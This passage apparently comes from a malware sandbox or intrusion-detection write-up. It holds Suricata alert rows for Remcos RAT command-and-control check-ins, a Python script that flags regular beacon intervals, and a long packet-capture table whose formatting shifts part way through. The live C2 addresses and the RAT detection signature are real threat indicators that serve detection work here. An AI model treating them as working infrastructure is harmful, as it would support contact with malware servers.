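2024-11-26T08:25:11.009478+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49769 | 192.169.69.262500 | TCP
2024-11-26T08:25:23.036101+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49800 | 162.216.243.152404 | TCP
2024-11-26T08:25:25.636529+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49806 | 192.169.69.262500 | TCP
2024-11-26T08:25:37.386560+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49831 | 162.216.243.152404 | TCP
2024-11-26T08:25:39.625415+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49837 | 192.169.69.262500 | TCP
2024-11-26T08:25:51.267856+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49862 | 162.216.243.152404 | TCP
2024-11-26T08:25:53.502242+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49868 | 192.169.69.262500 | TCP
"""

REMCOS_CHECKIN_SID = 2032776  # ET MALWARE Remcos 3.x Unencrypted Checkin, from the table


def parse_alerts(text):
    """Parse pipe-delimited alert rows into dicts with a timezone-aware timestamp."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src_ip, src_port, dest, proto = (f.strip() for f in line.split("|"))
        alerts.append({
            # %z accepts the +0100 offset form used by the report
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "signature": sig,
            "severity": int(sev),
            "src_ip": src_ip,
            "src_port": int(src_port),
            "dest": dest,      # opaque key; IP and port are not split
            "proto": proto,
        })
    return alerts


def intervals_by_dest(alerts, sid):
    """Seconds between consecutive alerts of one SID, grouped by destination."""
    stamps = defaultdict(list)
    for a in sorted(alerts, key=lambda a: a["ts"]):
        if a["sid"] == sid:
            stamps[a["dest"]].append(a["ts"])
    return {
        dest: [(later - earlier).total_seconds() for earlier, later in zip(ts, ts[1:])]
        for dest, ts in stamps.items()
    }


def regular_beacons(intervals, min_events=4, max_jitter=0.2):
    """Flag destinations whose gaps all stay within max_jitter (fraction) of their median.

    min_events and max_jitter are assumed thresholds for this example; a
    single alert (no interval) can never be flagged.
    """
    result = {}
    for dest, gaps in intervals.items():
        if len(gaps) + 1 < min_events:
            continue
        period = median(gaps)
        jitter = max(abs(g - period) for g in gaps) / period
        result[dest] = {
            "events": len(gaps) + 1,
            "period_s": round(period, 3),
            "jitter": round(jitter, 3),
            "regular": jitter <= max_jitter,
        }
    return result


if __name__ == "__main__":
    found = regular_beacons(intervals_by_dest(parse_alerts(ALERT_ROWS), REMCOS_CHECKIN_SID))
    for dest, info in found.items():
        print(dest, info)
```

Run stand-alone it reports both check-in destinations with a period of about 13.9 s and a jitter of a few per cent, and the single JA3 alert is never a candidate because only SID 2032776 is grouped and a lone event has no interval. Against live Suricata output the same grouping applies to the `timestamp`, `alert.signature_id`, `dest_ip` and `dest_port` fields of eve.json records, where the address and port arrive as separate fields.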
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 08:24:01.490304947 CET | 49730 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.490345001 CET | 443 | 49730 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:01.490468025 CET | 49730 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.490602970 CET | 49730 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.490642071 CET | 443 | 49730 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:01.490698099 CET | 49730 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.521456957 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.521502018 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:01.521652937 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.524688959 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:01.524702072 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:03.271239042 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:03.271330118 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:03.276211023 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:03.276231050 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:03.276597977 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:03.325562954 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:03.393924952 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:03.439333916 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.560884953 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.560899973 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.561024904 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.574063063 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.574071884 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.574151993 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.680775881 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.680932999 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.680953979 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.724354982 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.724364996 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.765374899 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.765453100 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.765460968 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.772233963 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.772315979 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.772321939 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.782427073 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.782505035 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.782516956 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.790474892 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.790534019 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.790539980 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.800935030 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.800997019 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.801004887 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.809930086 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.810018063 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.810024023 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.823236942 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.823311090 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.823324919 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.836844921 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.836934090 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.836942911 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.850657940 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.850718021 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.850725889 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.864341021 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.864409924 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.864422083 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.877796888 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.877851963 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.877863884 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.891525030 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.891571045 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.891580105 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.920557022 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.920614004 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.920625925 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.963175058 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.963296890 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.963306904 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.969774961 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.969834089 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.969841003 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.974127054 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.974188089 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.974195004 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.978562117 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.978591919 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.978636026 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.978646994 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.978696108 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.982989073 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.988904953 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.989001989 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.989006042 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.989022970 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:06.989073038 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:06.997636080 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.007807970 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.007867098 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.007879019 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.007893085 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.007950068 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.017932892 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.028017998 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.028079987 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.028086901 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.038038969 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.038100958 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.038116932 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.048219919 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.048274994 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.048299074 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.048319101 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.048363924 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.057996035 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.066849947 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.066911936 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.066935062 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.083228111 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.083302975 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.083326101 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.084933996 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.084991932 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.085009098 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.087599993 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.087650061 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.087663889 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.094291925 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.094345093 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.094358921 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.102989912 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.103053093 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.103070974 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.109158039 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.109203100 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.109215975 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.115567923 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.115642071 CET | 49731 | 443 | 192.168.2.4 | 142.250.181.33
Nov 26, 2024 08:24:07.115669012 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
Nov 26, 2024 08:24:07.122833967 CET | 443 | 49731 | 142.250.181.33 | 192.168.2.4
                                                                          Nov 26, 2024 08:24:07.122889996 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.122899055 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.128117085 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.128165960 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.128171921 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.165608883 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.165656090 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.165735960 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.165750980 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.165831089 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.168241024 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.170866013 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.170917034 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.170923948 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.173722982 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.173770905 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.173778057 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.176290989 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.176388025 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.176392078 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.178826094 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.178875923 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.178880930 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.181482077 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.181541920 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.181546926 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.186611891 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.186664104 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.186667919 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.189230919 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.189296007 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.189301968 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.193677902 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.193728924 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.193734884 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.199851036 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.199912071 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.199918985 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.203353882 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.203408957 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.203416109 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.211652994 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.211715937 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.211724997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.214119911 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.214178085 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.214185953 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.219388008 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.219451904 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.219460011 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.221589088 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.221638918 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.221643925 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.229270935 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.229304075 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.229337931 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.229350090 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.229394913 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.230304003 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.239346027 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.239437103 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.239439011 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.239465952 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.239516973 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.240366936 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.249367952 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.249409914 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.249443054 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.249449015 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.249495983 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.250372887 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.258810043 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.258867979 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.258873940 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.259483099 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.259536982 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.259541988 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.267864943 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.267932892 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.267936945 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.268951893 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.268997908 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.269002914 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.277331114 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.277357101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.277445078 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.277452946 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.277504921 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.278320074 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.285733938 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.285813093 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.285821915 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.285826921 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.285876036 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.286725998 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.294138908 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.294190884 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.294198036 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.295129061 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.295178890 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.295183897 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.302525043 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.302562952 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.302582026 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.302593946 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.302640915 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.303522110 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.308907986 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.308945894 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.308964014 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.308974981 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.309025049 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.310067892 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.315476894 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.315531015 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.315537930 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.316365004 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.316412926 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.316417933 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.322755098 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.322818995 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.322824955 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.323657990 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.323726892 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.323733091 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.327977896 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.328041077 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.328047037 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.328824997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.328879118 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.328882933 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.330410957 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.330461025 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.330467939 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.367023945 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.367139101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.367161036 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.367193937 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.367269039 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.368001938 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.369174004 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.369208097 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.369227886 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.369232893 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.369271994 CET49731443192.168.2.4142.250.181.33
